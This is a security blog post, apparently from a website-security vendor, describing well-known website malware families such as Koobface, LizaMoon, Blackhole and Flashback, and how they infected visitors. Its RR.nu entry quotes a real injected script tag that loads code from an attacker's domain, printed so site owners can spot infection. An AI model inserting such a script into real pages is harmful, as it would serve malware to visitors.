It used to be that malware was spread through sharing floppy disks. The threat eventually moved on to USB drive, email and file sharing downloads. Nowadays, the threats are so advanced that simply visiting a web site that contains malicious code can cause your computer to be infected.
Below, you will see a few examples of the most common types of malware that infects seemingly innocent web sites all over the world.
This is the malware that infected Leo Laporte’s TWiT.tv site. When people visited his site they were redirected to another web page with a cz.cc domain name that runs a file named woms.jar which infects the victim’s computer with Trojans that install fake anti-virus warnings and/or trigger a PDF vulnerability.
This malware targeted e-commerce sites running osCommerce and in under two weeks it was able to go from 90,000 known infections to over 6 million. The code allows attackers to exploit vulnerabilities in osCommerce and places an invisible iFrame on the page. When victims visit infected pages their computers are attacked through vulnerabilities in Java, Adobe Reader, Windows Help Center and Internet Explorer. We blogged about the “Willysy Injection Attacks” a while ago.
The name may seem a bit funny but the end result is not. This code is placed in a web site’s php files and causes the victim to be redirected to another site when the host page is accessed through a search engine. The attacker can then use the redirected site to infect the visitor’s computer.
Facebook and MySpace were among some of the social networks where Koobface ran free. Faking messages and comments from “friends” would be placed on a page. When victims would click on the link to view a video, they would be prompted to download an update, usually a codec, that would actually install malware allowing attackers to control the infected computer. Read more about “Koobface Malware Detection” in our other blog article.
Hacked sites that found this script <script src= “http://trill18ionsa.rr.nu/pmg.php?dr=1″></script> were infected with the RR.nu maware. Visitors to infected sites were redirected to a fake virus-scan website where they were tricked into paying for a bogus service while divulging credit card information. For more information on the RR.nu malware read our blog article “How to Deal with the Latest WordPress Outbreak?”
Using fake HTML forms injected into online banking login pages this malware allows the attacker to steal all sorts of information from the victim including account numbers, user names, passwords and credit card numbers. Read also “A trojan which steals your money “intelligently”
This SQL injection attack spread scareware to over 1.5 million computers between March and April of 2011. Infected users were coerced into installing “anti-virus software” that actually nothing more than a rogue application called Windows Stability Center. You find more information about the LizaMoon malware in our article “LizaMoon Hack: Mass SQL Injection” and “It’s LizaMoon All Over Again”
Using php code created with the Blackhole Toolkit, the attackers were able to place an iFrame on sites that sends visitors an executable file containing whatever payload the attacker desires. Some high profile sites that were attacked with this malware include Crytome.org, the government of Mexico, the State of Alabama, Ticketmaster and Microsoft’s store in India. We talked about the Blackhole Toolkit in “BlackHole Toolkit: Malware Running Wild”
One of the biggest reasons people flock to Apple products is because they are under the impression that their computer cannot be infected with malware since it is a Mac. Not true. Flashback is one of the latest password stealing programs aimed at Apple fanboys. By tricking users into updating or installing Adobe Flash Player, the code exploits a vulnerability in Java and then goes on to steal the victim’s passwords.
WordPress has made it easy for anyone to get a web site up and running. But it has also made it easier for attacker to infect even more sites than they ever thought possible. This Trojan is one of the more recent pieces of malware to infect sites running WordPress. Visitors to infected sites would find that they too have downloaded malware that infects their computers as well.
If you find this article interesting you also may want to check out this blog article “What is Malware? And How is Web-Malware Different?”